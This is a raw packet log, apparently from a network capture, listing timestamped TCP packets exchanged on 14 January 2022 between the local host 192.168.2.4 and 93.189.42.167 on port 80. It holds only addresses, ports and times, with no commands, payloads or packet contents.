Jan 14, 2022 00:16:06.987193108 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.987200975 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:06.987243891 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.987293005 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.987308025 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:06.987341881 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.987349033 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:06.987395048 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.987445116 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.987453938 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:06.987494946 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.987552881 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.039294958 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.039355040 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.039406061 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.039455891 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.039460897 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.039505959 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.039556980 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.039572001 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.039608955 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.039660931 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.039669037 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.039710045 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.039714098 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.039761066 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.039813042 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.039827108 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.039869070 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.039921999 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.039933920 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.039974928 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.040024996 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.040076017 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.040083885 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.040124893 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.040168047 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.040179014 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.040225029 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.040247917 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.040287971 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.040339947 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.040352106 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.040388107 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.040436983 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.040446043 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.040488005 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.040537119 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.040559053 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.040585995 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.040636063 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.040684938 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.040692091 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.040739059 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.040791035 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.040797949 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.040841103 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.040843010 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.040891886 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.040940046 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.040952921 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.040990114 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.041038990 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.041053057 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.041089058 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.041146040 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.041160107 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.041193962 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.041255951 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.041260004 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.041306973 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.041435957 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.091748953 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.091774940 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.091797113 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.091833115 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.091855049 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.091881990 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.091901064 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.091921091 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.091939926 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.091938972 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.091963053 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.091988087 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.091995955 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.092000961 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.092005968 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.092566013 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.092586994 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.092607975 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.092632055 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.092650890 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.092659950 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.092674017 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.092680931 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.092696905 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.092719078 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.092730045 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.092740059 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.092762947 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.092778921 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.092780113 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.092803955 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.092820883 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.092823982 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.092844963 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.092864037 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.092864990 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.092889071 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.092900991 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.092911005 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.092932940 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.092936039 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.092955112 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.092977047 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.092999935 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.093009949 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.093020916 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.093039036 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.093040943 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.093061924 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.093082905 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.093103886 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.093118906 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.093121052 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.093127012 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.093142986 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.093162060 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.093177080 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.093180895 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.093195915 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.093200922 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.093221903 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.093236923 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.093241930 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.093264103 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.093278885 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.093281984 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.093302965 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.093321085 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.093322992 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.093343019 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.093353987 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.093360901 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.093388081 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.142623901 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.142648935 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.142671108 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.142692089 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.142713070 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.142733097 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.142754078 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.142770052 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.142776012 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.142796993 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.142800093 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.142807961 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.142812967 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.142819881 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.142865896 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.144046068 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144068956 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144090891 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144113064 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144133091 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144154072 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144172907 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144186974 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.144195080 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144216061 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144217014 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.144223928 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.144229889 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.144241095 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144292116 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.144331932 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144350052 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144399881 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144406080 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.144418001 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144439936 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144474030 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.144479036 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144488096 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.144500017 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144522905 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144545078 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144555092 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.144567013 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144587994 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144603014 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.144610882 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144633055 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144645929 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.144654989 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144679070 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144696951 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144707918 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.144721985 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144727945 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.144745111 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144762993 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144778013 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.144785881 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144804955 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144824982 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144834995 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.144845009 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144865036 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144869089 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.144887924 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144891977 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.144908905 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144927979 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.144952059 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.144965887 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.194777012 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.194809914 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.194833994 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.194854021 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.194875956 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.194897890 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.194906950 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.194920063 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.194941998 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.194961071 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.194972992 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.194983959 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.195005894 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.195054054 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.195956945 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.195983887 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.196006060 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.196026087 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.196047068 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.196048021 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.196069002 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.196080923 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.196094036 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.196119070 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.196125984 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.196141005 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.196160078 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.196175098 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.196182013 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.196202993 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.196206093 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.196258068 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.196997881 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.197021961 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.197058916 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.197083950 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.197108030 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.197118998 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.197134018 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.197160006 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.197180986 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.197185993 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.197194099 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.197211981 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.197237968 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.197242975 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.197266102 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.197289944 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.197290897 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.197314978 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.197340012 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.197364092 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.197374105 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.197391033 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.197396994 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.197415113 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.197441101 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.197447062 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.197469950 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.197493076 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.197516918 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.197519064 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.197541952 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.197552919 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.197568893 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.197592974 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.197593927 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.197618961 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.197643042 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.197665930 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.197694063 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.247385025 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.247452021 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.247512102 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.247520924 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.247566938 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.247622013 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.247623920 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.247679949 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.247723103 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.247777939 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.247780085 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.247827053 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.247834921 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.247888088 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.247944117 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.247996092 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.247996092 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.248049021 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.248099089 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.248101950 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.248157024 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.248162985 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.248214960 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.248269081 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.248271942 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.248322010 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.248373985 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.248377085 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.248429060 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.248481035 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.248533010 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.248534918 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.248589993 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.248642921 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.248642921 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.248702049 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.248716116 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.248756886 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.248811007 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.248831034 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.248864889 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.248924017 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.248931885 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.248980045 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.249031067 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.249032021 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.249090910 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.249151945 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.249202013 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.249203920 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.249257088 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.249269009 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.249310970 CET	80	49899	93.189.42.167	192.168.2.4
